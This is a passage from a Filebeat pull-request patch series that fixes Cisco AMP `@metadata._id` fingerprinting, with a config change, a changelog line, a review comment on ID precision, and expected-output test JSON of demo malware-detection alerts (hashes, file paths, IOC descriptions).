"tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 43815, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T11:26:36.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419179204872503299", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 643000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419179213462438000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 45179, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": 
[ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T11:26:35.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419179209167470602", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 957000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419179209167471000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 46299, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + 
], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T11:26:35.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.ED01EBFBC9-100.SBX.TG", + "cisco.amp.detection_id": "6419179209167470598", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 941000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419179209167471000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 47663, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + 
}, + { + "@timestamp": "2021-01-14T11:26:35.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419179209167470601", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 941000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419179209167471000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 49034, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T10:59:33.000Z", + "cisco.amp.computer.active": 
true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "04:e6:4d:d5:7a:b5" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.MAP.Ransomware.rewrite", + "cisco.amp.detection_id": "6583840593074454529", + "cisco.amp.event_type_id": 1090519105, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "04:e6:4d:d5:7a:b5" + ], + "cisco.amp.timestamp_nanoseconds": 231000000, + "event.action": "Malicious Activity Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6583840597369422000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "75a758a0c5cea48c9922d64a113d0f9d", + "file.hash.sha1": "c78f4c22dd195a1791472a2c271a0c85b53900d9", + "file.hash.sha256": "90b63fbdde1b1aa7295e6cbe9ab7726792f8829eb53f2327f8a9cf109054f2a0", + "file.name": "mscorsvw.exe", + "file.path": "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorsvw.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_MAP_FriedEx", + "host.name": "Demo_AMP_MAP_FriedEx", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 52012, + "process.hash.md5": "71c85477df9347fe8e7bc55768473fca", + "process.hash.sha1": "ff658a36899e43fec3966d608b4aa4472de7a378", + "process.hash.sha256": "a86d6a6d1f5a0efcd649792a06f3ae9b37158d48493d2eca7f52dcc1cb9b6536", + "process.name": "services.exe", + "process.pid": 480, + "related.hash": [ + "90b63fbdde1b1aa7295e6cbe9ab7726792f8829eb53f2327f8a9cf109054f2a0", + "75a758a0c5cea48c9922d64a113d0f9d", + "c78f4c22dd195a1791472a2c271a0c85b53900d9" + ], + "related.hosts": [ + "Demo_AMP_MAP_FriedEx" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + 
"related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T10:59:30.000Z", + "cisco.amp.cloud_ioc.description": "Shadow copies are snapshots of part of the filesystem, used for backups and restore points. Ransomware may delete these to prevent the user from restoring files that it has encrypted or destroyed. Aside from ransomware, shadow copy deletion may also be used by other types of malware to remove forensic evidence of malicious activity.", + "cisco.amp.cloud_ioc.short_description": "W32.PossibleRansomwareShadowCopyDeletion.ioc", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "04:e6:4d:d5:7a:b5" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296274, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "04:e6:4d:d5:7a:b5" + ], + "cisco.amp.timestamp_nanoseconds": 182000000, + "event.action": "Cloud IOC", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 6701398782847286000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "event.start": "2021-01-14T10:59:30.000Z", + "file.hash.sha256": "e09bf4d27555ec7567a598ba89ccc33667252cef1fb0b604315ea7562d18ad10", + "file.name": "vssadmin.exe", + "file.path": "file:///C%3A/Windows/SysWOW64/vssadmin.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_MAP_FriedEx", + "host.name": "Demo_AMP_MAP_FriedEx", + "input.type": "log", + "log.offset": 53662, + "process.hash.sha256": "90b63fbdde1b1aa7295e6cbe9ab7726792f8829eb53f2327f8a9cf109054f2a0", + "related.hash": [ + 
"e09bf4d27555ec7567a598ba89ccc33667252cef1fb0b604315ea7562d18ad10" + ], + "related.hosts": [ + "Demo_AMP_MAP_FriedEx" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T10:55:07.000Z", + "cisco.amp.cloud_ioc.description": "PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a shell was launched with an encoded command or to use Base64 to decode or encode an existing file or command. Malware authors may use this technique to bypass antivirus tools.", + "cisco.amp.cloud_ioc.short_description": "W32.PowershellEncodedBuffer.ioc", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "04:e6:4d:d5:7a:b5" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296274, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "04:e6:4d:d5:7a:b5" + ], + "cisco.amp.timestamp_nanoseconds": 260000000, + "event.action": "Cloud IOC", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 7007136036637603000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "event.start": "2021-01-14T10:55:07.000Z", + "file.hash.sha256": "db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386", + "file.name": "cmd.exe", + "file.path": "file:///C%3A/Windows/system32/cmd.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_MAP_FriedEx", + "host.name": "Demo_AMP_MAP_FriedEx", + "input.type": "log", + "log.offset": 55441, + "process.hash.sha256": "a86d6a6d1f5a0efcd649792a06f3ae9b37158d48493d2eca7f52dcc1cb9b6536", + "related.hash": [ 
+ "db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386" + ], + "related.hosts": [ + "Demo_AMP_MAP_FriedEx" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T10:47:17.000Z", + "cisco.amp.cloud_ioc.description": "PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.", + "cisco.amp.cloud_ioc.short_description": "W32.PowershellDownloadedExecutable.ioc", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "b6:9c:d0:89:b8:66" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296274, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "b6:9c:d0:89:b8:66" + ], + "cisco.amp.timestamp_nanoseconds": 250000000, + "event.action": "Cloud IOC", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 1476905066250000100, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "event.start": "2021-01-14T10:47:17.000Z", + "file.hash.sha256": "8133502266008b77de7921451e1210b0ef3f0ed2db7d8d3ee0c3350d856fa6fa", + "file.name": "powershell.exe", + "file.path": "/C:/Windows/SysWoW64/WindowsPowerShell/v1.0/powershell.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Command_Line_Arguments_Kovter", + "host.name": "Demo_Command_Line_Arguments_Kovter", + "input.type": "log", + "log.offset": 57151, + "process.hash.sha256": 
"9d52813a48adcad9eb9df2768aaca43924d503cda2de26b27133d6e3654077ff", + "related.hash": [ + "8133502266008b77de7921451e1210b0ef3f0ed2db7d8d3ee0c3350d856fa6fa" + ], + "related.hosts": [ + "Demo_Command_Line_Arguments_Kovter" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T10:47:17.000Z", + "cisco.amp.cloud_ioc.description": "Microsoft Word launched PowerShell. This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.", + "cisco.amp.cloud_ioc.short_description": "W32.WinWord.Powershell", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "b6:9c:d0:89:b8:66" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296274, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "b6:9c:d0:89:b8:66" + ], + "cisco.amp.timestamp_nanoseconds": 228000000, + "event.action": "Cloud IOC", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 1476905066228000300, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "event.start": "2021-01-14T10:47:17.000Z", + "file.hash.sha256": "8133502266008b77de7921451e1210b0ef3f0ed2db7d8d3ee0c3350d856fa6fa", + "file.name": "powershell.exe", + "file.path": "/C:/Windows/SysWoW64/WindowsPowerShell/v1.0/powershell.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Command_Line_Arguments_Kovter", + "host.name": "Demo_Command_Line_Arguments_Kovter", + "input.type": "log", + "log.offset": 58928, + "process.hash.sha256": 
"9d52813a48adcad9eb9df2768aaca43924d503cda2de26b27133d6e3654077ff", + "related.hash": [ + "8133502266008b77de7921451e1210b0ef3f0ed2db7d8d3ee0c3350d856fa6fa" + ], + "related.hosts": [ + "Demo_Command_Line_Arguments_Kovter" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T10:33:46.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6411425813945647106", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 758000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411425813945647000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "input.type": "log", + "log.offset": 60601, + "related.hash": [ + "12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T10:33:46.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + 
"cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6411425813945647105", + "cisco.amp.event_type_id": 553648155, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 758000000, + "event.action": "Retrospective Quarantine", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411425813945647000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "input.type": "log", + "log.offset": 61802, + "related.hash": [ + "12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + } +] \ No newline at end of file diff --git a/x-pack/filebeat/module/cisco/fields.go b/x-pack/filebeat/module/cisco/fields.go index 4d465edfa975..1365580900aa 100644 --- a/x-pack/filebeat/module/cisco/fields.go +++ b/x-pack/filebeat/module/cisco/fields.go @@ -19,5 +19,5 @@ func init() { // AssetCisco returns asset data. // This is the base64 encoded gzipped contents of module/cisco. func AssetCisco() string { - return "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" + return "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" } From 2600f56d6c01ac5d1a87f9bb2c934fa0a0f65366 Mon Sep 17 00:00:00 2001 
From: Andrew Kroh Date: Wed, 24 Mar 2021 20:20:03 -0400 Subject: [PATCH 13/20] Fix cisco amp @metadata._id calculation (#24718) (#24754) The detection_id wasn't sufficient to uniquely identify documents. Closes #24717 (cherry picked from commit 82a210aabb971ba2add1365b074617dc6d3cdaaa) Co-authored-by: Lee Hinman <57081003+leehinman@users.noreply.github.com> --- CHANGELOG.next.asciidoc | 1 + .../module/cisco/amp/config/config.yml | 20 +- .../test/cisco_amp1.ndjson.log-expected.json | 403 ++ .../test/cisco_amp4.ndjson.log-expected.json | 3386 +++++++++++++++-- .../test/cisco_amp5.ndjson.log-expected.json | 1511 +++++++- .../test/cisco_amp6.ndjson.log-expected.json | 785 +++- .../test/cisco_amp7.ndjson.log-expected.json | 504 +++ 7 files changed, 5981 insertions(+), 629 deletions(-) diff --git a/CHANGELOG.next.asciidoc b/CHANGELOG.next.asciidoc index 341fe104bdc4..9574394aea85 100644 --- a/CHANGELOG.next.asciidoc +++ b/CHANGELOG.next.asciidoc @@ -201,6 +201,7 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Fix `google_workspace` pagination. {pull}24668[24668] - Fix netflow module ignoring detect_sequence_reset flag. {issue}24268[24268] {pull}24270[24270] - Fix Cisco ASA parser for message 302022. {issue}24405[24405] {pull}24697[24697] +- Fix Cisco AMP `@metadata._id` calculation {issue}24717[24717] {pull}24718[24718] - Fix date parsing in GSuite/login and Google Workspace/login filesets. {issue}24694[24694] - Fix gcp/vpcflow module error where input type was defaulting to file. {pull}24719[24719] diff --git a/x-pack/filebeat/module/cisco/amp/config/config.yml b/x-pack/filebeat/module/cisco/amp/config/config.yml index 0aa38440947e..888fdae449d6 100644 --- a/x-pack/filebeat/module/cisco/amp/config/config.yml +++ b/x-pack/filebeat/module/cisco/amp/config/config.yml 
@@ -61,16 +61,16 @@ processors:
 - decode_json_fields:
 fields: [message]
 target: json
- - if:
- has_fields: ["json.data.detection_id"]
- then:
- - fingerprint:
- fields: ["json.data.detection_id"]
- target_field: "@metadata._id"
- else:
- - fingerprint:
- fields: ["json.data.timestamp", "json.data.timestamp_nanoseconds", "json.data.event_type_id", "json.data.connector_guid"]
- target_field: "@metadata._id"
+ - fingerprint:
+ fields:
+ - "json.data.timestamp"
+ - "json.data.timestamp_nanoseconds"
+ - "json.data.event_type_id"
+ - "json.data.connector_guid"
+ - "json.data.id"
+ - "json.data.detection_id"
+ target_field: "@metadata._id"
+ ignore_missing: true
 - add_fields:
 target: ''
 fields:
diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp1.ndjson.log-expected.json b/x-pack/filebeat/module/cisco/amp/test/cisco_amp1.ndjson.log-expected.json
index 4a602ba1c2b6..6f6bb95e97a5 100644
--- a/x-pack/filebeat/module/cisco/amp/test/cisco_amp1.ndjson.log-expected.json
+++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp1.ndjson.log-expected.json
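Review bot: The `json.data.id` entry added to the fingerprint field list appears to be hashed after the JSON number has already lost precision, so it adds less uniqueness than intended: in the cisco_amp1 expected output the events with detection_id 6533241145273614337 and 6533241145273614338 both end up with `event.id` 6533241145273614000, which is what a 64-bit id decoded as a float64 would give, and only the string-valued `json.data.detection_id` plus the nanosecond timestamp keep those two documents apart. For event types that carry no detection_id the new `@metadata._id` therefore presumably rests on the lossy id and the timestamps alone, so it is worth confirming whether `decode_json_fields` can preserve large integers here or whether hashing the raw `message` would be the safer key. Separately, with `ignore_missing: true` a record that lacks all six fields would presumably hash to a constant `_id` and silently overwrite its siblings, which deserves a comment above the processor such as `# detection_id alone is not unique (#24717); timestamp/id/connector_guid disambiguate. ignore_missing tolerates event types without detection_id or id.`. The enclosing `processors:` list starts and continues outside this hunk.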
@@ -179,6 +179,59 @@ "forwarded" ] }, + { + "@timestamp": "2021-01-14T10:06:39.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "24:78:d8:fd:c4:75" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6533241347137077251", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "24:78:d8:fd:c4:75" + ], + "cisco.amp.timestamp_nanoseconds": 657000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533241347137077000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Quarantined", + "host.name": "Demo_AMP_Threat_Quarantined", + "input.type": "log", + "log.offset": 3885, + "related.hash": [ + "a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850" + ], + "related.hosts": [ + "Demo_AMP_Threat_Quarantined" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, { "@timestamp": "2021-01-14T10:05:52.000Z", "cisco.amp.computer.active": true, 
@@ -307,6 +360,128 @@ "forwarded" ] }, + { + "@timestamp": "2021-01-14T10:05:52.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "24:78:d8:fd:c4:75" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Overdrive.RET", + "cisco.amp.detection_id": "6533241145273614337", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "24:78:d8:fd:c4:75" + ], + "cisco.amp.timestamp_nanoseconds": 525000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533241145273614000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850", + "file.name": "BIT4BBF.tmp", + "file.path": "\\\\?\\C:\\BIT4BBF.tmp", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Quarantined", + "host.name": "Demo_AMP_Threat_Quarantined", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 7800, + "process.hash.md5": "54a47f6b5e09a77e61649109c6a08866", + "process.hash.sha1": "4af001b3c3816b860660cf2de2c0fd3c1dfb4878", + "process.hash.sha256": "121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2", + "process.name": "svchost.exe", + "process.pid": 896, + "related.hash": [ + "a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850" + ], + "related.hosts": [ + "Demo_AMP_Threat_Quarantined" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", 
